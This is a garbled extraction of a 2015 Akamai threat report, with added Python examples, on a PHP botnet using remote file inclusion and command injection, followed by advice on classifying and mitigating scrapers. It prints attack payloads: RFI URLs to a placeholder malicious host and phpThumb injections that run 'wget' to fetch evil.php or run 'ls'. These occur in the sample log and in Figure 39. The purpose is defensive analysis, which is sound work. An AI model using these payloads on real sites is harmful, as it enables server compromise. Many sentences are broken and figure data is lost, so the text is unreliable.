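The profiling technique described in this section, and illustrated by the two Figure 32 requests, can be reproduced from ordinary web server logs without touching the botnet. The script below is an added example, not Akamai's implementation: over a constructed log extract (the two Figure 32 rows plus invented rows using documentation addresses, a `victim3`/`victim4` pair, and a placeholder `other.example.invalid` host) it pulls every parameter value that hands a remote URL to `include()` or to a shell, normalizes the remote resource, and clusters requests by that payload. A payload reused from several sources against several victims is the fingerprint of one operator driving many compromised machines; the `min_sources`/`min_victims` thresholds are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log extract: source IP, victim host, request line. The first
# two rows reuse the addresses and URLs printed in Figure 32; the remaining rows
# (203.0.113.x / 198.51.100.x documentation addresses, victim3/victim4) are
# made up to show a third bot, an unrelated payload and a benign request.
SAMPLE_LOG = """\
10.1.1.1 www.victim1.site GET /page.php?module_name=http://www.malicious.site/bad.php HTTP/1.1
192.168.1.1 www.victim2.site GET /index.php?inc_path=http://www.malicious.site/bad.php HTTP/1.1
203.0.113.40 www.victim3.site GET /phpThumb.php?src=file.jpg&fltr[]=blur%7C9%20%3Bwget%20http://www.malicious.site/bad.php%20-O%20x.php%3B HTTP/1.1
198.51.100.7 www.victim4.site GET /page.php?module_name=http://other.example.invalid/inc.txt HTTP/1.1
203.0.113.9 www.victim1.site GET /page.php?module_name=news HTTP/1.1
"""

URL_RE = re.compile(r"(?:https?|ftp)://[^\s;&'\"<>|`]+", re.IGNORECASE)
SHELL_SEP_RE = re.compile(r"[;|`]|\$\(")


def parameters(path):
    """Yield (name, decoded value) pairs from the query string of a request path.
    Split by hand on '&' so that a literal ';' in a value is never treated as
    a separator, whatever the Python version's parse_qs default is."""
    _, _, query = path.partition("?")
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            yield unquote_plus(name), unquote_plus(value)


def classify(value):
    """Return (kind, remote_url) when a parameter value fetches remote code:
    'rfi' when the whole value is a URL (what include() would load),
    'command-injection' when a URL follows a shell separator."""
    m = URL_RE.search(value)
    if not m:
        return None, None
    url = m.group().rstrip("?").lower()   # Figure 30's trailing '?' is noise
    if m.start() == 0:
        return "rfi", url
    if SHELL_SEP_RE.search(value[:m.start()]):
        return "command-injection", url
    return None, None


def cluster_by_payload(log_text):
    """Map each remote code URL to the distinct sources, victims and parameter
    names that carried it."""
    clusters = {}
    for line in log_text.splitlines():
        src, host, _method, path, _proto = line.split()
        for name, value in parameters(path):
            kind, url = classify(value)
            if not url:
                continue
            c = clusters.setdefault(url, {"sources": set(), "victims": set(),
                                          "params": set(), "kinds": set()})
            c["sources"].add(src)
            c["victims"].add(host)
            c["params"].add(name)
            c["kinds"].add(kind)
    return clusters


def botnet_candidates(clusters, min_sources=2, min_victims=2):
    """Payloads reused from several sources against several victims."""
    return sorted(url for url, c in clusters.items()
                  if len(c["sources"]) >= min_sources and len(c["victims"]) >= min_victims)


if __name__ == "__main__":
    clusters = cluster_by_payload(SAMPLE_LOG)
    for url in botnet_candidates(clusters):
        c = clusters[url]
        print(url, "sources:", sorted(c["sources"]), "victims:", sorted(c["victims"]),
              "vectors:", sorted(c["kinds"]))
```

On the sample, `bad.php` clusters three sources against three victims across two different injection vectors, while the `inc.txt` payload and the benign `module_name=news` request stay out of the candidate list; the same pass over real logs yields the source and victim sets that Figures 33 through 37 summarize.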
botnets targeted more than 850 web applications across several top-level domains,
as shown in Figure 33.
Figure 33: Targets by top-level domain (counts for .edu, .org and .mil not preserved)
.com           485
.gov            79
.edu
.org
.mil
Country TLDs   270
The top 10 country top-level domains of victim sites were distributed as shown in
Figure 34.
Figure 34: Victim sites by country top-level domain
Country TLD   Victim Sites
.uk           23
.ca           20
.jp           14
.de           13
.es           12
.fr           12
.be           11
.nl           11
.ln
.dk
Targeted web applications were distributed across verticals as shown in Figure 35.
Figure 35: Targeted web applications by industry vertical (percent)
Retail                  26.4
(label not preserved)   15.8
(label not preserved)   12.4
Public Sector           12.0
High Technology          8.3
Business Services        7.3
Consumer Goods           5.3
Financial Services       3.9
Automotive               3.0
Manufacturing            1.5
Gaming                   1.1
Pharma/Health Care       0.9
Software as a Service    0.8
Foundation               0.6
(label not preserved)    0.3
Consumer Services        0.2
Miscellaneous            0.2
4.4B / Attack Traffic Origins / All of the botnet attack traffic appeared to
Number of bots by web server software: Apache 11, Microsoft IIS, NGINX, Unidentified
A closer look at the source countries of the attacking machines reveals attacks coming
from 15 countries, as shown in Figure 37. About a third of the attacking machines
were located in the U.S. Only a minority of attacks came through proxies, which
makes sense given that the attacking machines were compromised web servers.
[Figure 37 chart data: attackers by country (United States, United Kingdom, France, Germany, Spain, Argentina, Canada, Indonesia, Israel, Japan, South Korea, Romania, Turkey, Taiwan, Vietnam); the per-country counts did not survive extraction.]
Figure 37: Origins of attack traffic, which was all generated by compromised web servers
Crawling capabilities for this kind of botnet are unusual and seem to indicate a
technological advancement. The vast majority of similar botnets observed by
Akamai are simple: they scan the Internet blindly for known vulnerabilities
rather than probing to discover application-specific vulnerabilities.
4.4D / Propagation / Botnet operators strive to keep their botnets alive and
http://www.victim.site/phpThumb.php?
rc=file.jpg&fltr[]=blur%7C9%20-quality%2075%20-interlace%20line%20
fail.jpg%20jpeg:fail.jpg%20;ls;&phpThumbDebug=9%0A?src=file.jpg&fltr[]=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20
jpeg:fail.jpg%20;wget% http://wordpress.com.malicious.site/evil.php
%20-O%20evil.php;&phpThumbDebug=9
Figure 39: Sample payload 2
Another attribute of the botnet was its thorough coverage of all digital properties
belonging to the victim's organization. For example, for each target organization the
botnet would scan all possible domains (e.g., victim.com, victim.co.uk, victim.de, etc.).
attacks both point to a malicious PHP resource that is accessible over the web, the
task of obtaining the remote code is rather simple: all one has to do is download
the code using a browser or HTTP client. The botnet code had text written in Malay,
which may indicate the botnet owner is Malaysian.
4.5A / Remote Shell Command Execution / As shown in the source code in
Figure 40, the botnet enables a remote user to execute commands on the victim
application by using PHP's shell_exec() function.
4.5B / Remote File Upload / The botnet also enables a remote attacker to upload
arbitrary files to the victim's machine quickly and easily, as shown in Figure 41.
discovered in the code was the ability to send SMS (through a dedicated web
service). This capability was controlled by commands sent to the botnet via IRC
channels, as shown in Figure 42.
Figure 42: The botnet code for SMS-sending capability, which works over a dedicated IRC channel
4.5D / Other Capabilities / The following two capabilities were also identified:
[ SECTION ] 5
PERFORMANCE
MITIGATION
Bots, Spiders and Scrapers
access data, but many now use screen-scraping to collect information. As bots and
scrapers become more prevalent, they increase the load on web servers. While bot
behavior is benign for the most part, poorly-coded bots can impact site performance
and may resemble denial of service attacks or may be part of a rival's competitive
intelligence program. Understanding the different categories of third-party content
bots, how they affect a website, and how to mitigate their impact, is an important
part of building a secure web presence.
Akamai has seen bots and scrapers used for many purposes including:
Setting up fraudulent sites
Reuse of consumer price indices
Analysis of corporate financial statements
Metasearch engines
Search engines
Data mashups
Analysis of stock portfolios
Competitive intelligence
Location tracking
Examples of some of these uses of third-party site content are shown in Figures 43,
44 and 45.
Figure 43: Bot targeting a financial aggregator to scrape a large amount of data quickly
5.1 / Four Categories of Bots and Scrapers / Bots and scrapers can be divided
desired bot. These bots help users find content and are well-behaved: they respect
robots.txt and don't make many requests at once.
5.1B / Undesired, Highly Aggressive / Some benign bots are poorly-coded and
send a large volume of requests or have poor error handling, which puts them in
an undesired category. Malicious bots that disrupt web servers by using GET or
POST floods also fit in this category; in extreme cases, a bot may cause a small-scale
application-layer denial of service attack. Some very aggressive scrapers attempt to
iterate through lists of stocks or airfares very rapidly. In one case, a bot looking for
pricing information on a retailer site disrupted analytics by making a high number
of requests for a small number of products.
During 2014, Akamai has observed a substantial increase in the number of these
bots and scrapers hitting the travel, hotel and hospitality sectors. The growth in
scrapers targeting these sectors is likely driven by a proliferation of rapidly developed
mobile apps that use scrapers as the fastest and easiest way to collect information
from disparate websites.
Scrapers target room rate pages for hotels, as well as pricing and schedules
for airlines. In many cases that Akamai has investigated, scrapers and bots were
making several thousand requests per second, far in excess of what can be expected
by a human using a web browser.
5.1C / Highly Desired, High Aggression / Highly desirable bots with high
aggression are more difficult to manage because they can't be blocked totally.
However, their aggressiveness can cause site slowdowns and latency. An example is
the spider bot from the Chinese search engine Baidu. Baidu bots have poor request
throttling, and can even saturate their own outbound network. This type of search
spider can help organizations attract new users in emerging markets, such as Brazil,
Russia, India and China, but in the process, they may flood sites with requests and
thus trigger alerts for possible denial of service attacks.
5.1D / Low Desirability, Low Aggression / Bots that crawl a site's product pages
with intent to reuse the content on shadow sites for fraud or counterfeiting scams
fit into this category. These bots often stay under the detection threshold of security
products and try to blend in with regular user traffic through the use of headless
browsers such as PhantomJS, making them difficult to block.
An interesting development in the use of headless browsers is the advent of
companies that offer scraping as a service, such as PhantomJs Cloud. These sites
make it easy for users to scrape content and have it delivered, lowering the bar to
entry and making it easier for unskilled individuals to scrape content while hiding
behind a service.
5.2 / Triage and Categorization / Mitigation techniques vary depending on the
classification of the bot. Akamai uses a wide variety of techniques to determine the
owner and intent of a bot. For example, the volume of requests can help Akamai
determine the bot's platform. In general, we use the following categorizations:
Home broadband connection: 1,000-4,000 requests per minute
Branch office: 5,000-10,000 requests per minute
Hosted server or server farms: 10,000+ requests per minute
The sequence and pages a bot scrapes can also reveal information about the bot's
intent. For example, a competitive-analysis bot will only scrape product descriptions,
SKU/item IDs and prices, while a fraudulent bot will also request images. A website
copier, such as a recursive Wget (formerly Geturl), also loads index and search pages.
In addition, the User-Agent header can sometimes provide a unique and identifiable
user agent, such as Googlebot, urllib or curl, and a Whois lookup can sometimes expose
bot owners.
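As an added example (not Akamai's tooling), the following Python applies the triage heuristics above to constructed traffic: peak requests per minute are mapped to the platform bands quoted in the text, the mix of paths a client requests is read as intent, and the User-Agent is checked for a known tool or crawler name. The path patterns, the agent list, the minute-bucket record format and the synthetic traffic are all assumptions.

```python
import re
from collections import Counter, defaultdict

# Requests-per-minute bands quoted in the text, highest first.
PLATFORM_BANDS = [(10_000, "hosted server/server farm"), (5_000, "branch office"),
                  (1_000, "home broadband connection")]
# User-agent substrings naming a known tool or crawler (assumed list).
KNOWN_AGENTS = ("googlebot", "bingbot", "baiduspider", "urllib", "curl", "wget")

def classify_path(path):
    """Bucket a path the way the text reads intent: product data, image, or index/search."""
    if re.search(r"\.(jpe?g|png|gif)$", path, re.I):
        return "image"
    if re.search(r"/(product|sku|price)", path, re.I):
        return "product"
    return "index" if path == "/" or re.search(r"/(index|search)", path, re.I) else "other"

def platform_for_rate(rpm):
    return next((label for limit, label in PLATFORM_BANDS if rpm >= limit), "below bot bands")

def intent_for_kinds(kinds):
    if "index" in kinds:                     # copiers also load index and search pages
        return "website copier"
    if {"product", "image"} <= kinds:        # fraud bots also request images
        return "fraud/shadow-site bot"
    return "competitive-analysis bot" if kinds == {"product"} else "unclassified"

def triage(records):
    """records: (client_ip, minute_bucket, path, user_agent); returns per-client verdicts."""
    per_min, kinds, agents = Counter(), defaultdict(set), {}
    for ip, minute, path, ua in records:
        per_min[(ip, minute)] += 1
        kinds[ip].add(classify_path(path))
        agents[ip] = ua
    peak = {ip: max(n for (i, _), n in per_min.items() if i == ip) for ip in kinds}
    return {ip: {"peak_rpm": peak[ip], "platform": platform_for_rate(peak[ip]),
                 "intent": intent_for_kinds(kinds[ip]) if peak[ip] >= PLATFORM_BANDS[-1][0] else "n/a",
                 "ua_hint": next((a for a in KNOWN_AGENTS if a in agents[ip].lower()), None)}
            for ip in kinds}

def synthetic_records():
    """Constructed traffic on RFC 5737 documentation addresses, not real log data."""
    recs = [("198.51.100.7", 0, f"/product/sku-{i % 40}", "Python-urllib/3.8") for i in range(6_000)]
    recs += [("203.0.113.9", 0, f"/product/sku-{i % 40}" if i % 2 else f"/img/{i % 40}.jpg",
              "Mozilla/5.0 PhantomJS/1.9") for i in range(1_500)]
    recs += [("192.0.2.44", 1, ("/", "/search?q=a", "/product/sku-3")[i % 3], "Wget/1.16")
             for i in range(12_000)]
    recs += [("192.0.2.10", 1, "/product/sku-3", "Mozilla/5.0 (Windows NT 6.1)") for _ in range(12)]
    return recs
```

Running triage(synthetic_records()) labels the urllib client a branch-office competitive-analysis bot, the PhantomJS client a home-broadband fraud bot, the Wget client a hosted website copier, and the 12-request client as below the bot bands.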
5.3 / Mitigation / For each type of bot, there is a corresponding mitigation strategy,
5.3A / Undesired, Highly Aggressive / The most readily detectable bots are often
those with very high aggression and low desirability. Server log analysis may show
many hits to a page in a short amount of time, often crawling through lists of URLs.
Bots like these are usually easily detected and easily mitigated using a combination
of blacklists and rate controls; both capabilities are built into Akamai's Kona Web
Application Firewall.
slightly different problem. These bots adversely impact operations, but they bring
a benefit to the organization. Therefore, it is impractical to block them fully. Rate
controls with a high threshold, or a user-prioritization application (UPA) product,
are a good way to minimize the impact of a bot. This permits the bot access to the
site until the number of requests reaches a set threshold, at which point the bot is
blocked or sent to a waiting room. In the meantime, legitimate users are able to
access the site normally.
5.3C / Low Desirability, Low Aggression / Bots that attempt to evade controls
and disguise themselves as normal traffic are a challenge to mitigate. In many cases,
these bots are watched closely by their owners, and their behavior may be modified
on the fly to adapt to new defenses. This class of bots, with low aggression and low
desirability, are probably the most difficult to mitigate. The best response Akamai
has developed is to employ client validation on sensitive pages. Java checkers and
CAPTCHAs can slow the bot and force the controllers to add more code to try to
pass the validation scheme.
While it is almost impossible and usually undesirable to defend an entire site from
bots of this type, placing countermeasures around sensitive pages, such as search
and login pages, can curtail bot activity. In many cases, organizations combine
validation with rate controls, and only use the validation scheme with suspicious IP
addresses that have crossed set thresholds.
Be aware that dedicated bot-herders will adapt to most client validation methods
eventually. The goal is to reduce the efficiency of the bot and make it too costly for
the bot-herder to continue to operate against the organization's website.
5.3D / Highly Desired, Low Aggression / Finally, there is the case of bots that are
desired and are not overly aggressive. While it's possible to ignore this class of bots,
there are ways to further reduce their impact on a website. In many cases, these
bots are looking for information and don't have another method of collecting it.
Offering an API or a dedicated data feed can move the load off the website and free
up resources for users, while providing other organizations the information they
need in a more digestible form. This approach will not work in all situations: web
spiders will always request a web page, for example, but if business partners are
looking for rate or location information, providing a better way to request the data
can be a viable option.
5.4 / Conclusion / Moving forward, bots and scrapers will continue to be a problem
of scrapers will increase as developers create small mobile apps that aggregate
data for the convenience of their users. Development of a strategy to contain and
mitigate the effects of undesirable bots should be a part of the operations plan of
every website.
Whether using a defensive framework such as the one presented here, or another
method, it's important for each organization to evaluate which bots it will allow to
access its site. A set of bots that are highly desirable for one organization may appear
malicious to another, and the criteria can change over time. As an organization
expands into new markets, a previously unwanted bot may become the key to
sharing information. Frequent analysis and modification of security policies is key
to mitigating the risks posed by bots and scrapers.
[ SECTION ] 6
LOOKING FORWARD
Akamai is a leading provider of cloud services for delivering, optimizing and securing online content and business applications. At the core of the company's solutions is the Akamai Intelligent
Platform providing extensive reach, coupled with unmatched reliability, security, visibility and expertise. Akamai removes the complexities of connecting the increasingly mobile world,
supporting 24/7 consumer demand, and enabling enterprises to securely leverage the cloud. To learn more about how Akamai is accelerating the pace of innovation in a hyperconnected
world, please visit www.akamai.com or blogs.akamai.com, and follow @Akamai on Twitter.
Akamai is headquartered in Cambridge, Massachusetts in the United States with operations in more than 40 offices around the world. Our services and renowned customer care
enable businesses to provide an unparalleled Internet experience for their customers worldwide. Addresses, phone numbers and contact information for all locations are listed on
www.akamai.com/locations.
© 2015 Akamai Technologies, Inc. All Rights Reserved. Reproduction in whole or in part in any form or medium without express written permission is prohibited. Akamai and the Akamai
wave logo are registered trademarks. Other trademarks contained herein are the property of their respective owners. Akamai believes that the information in this publication is accurate as of its
publication date; such information is subject to change without notice. Published 01/15.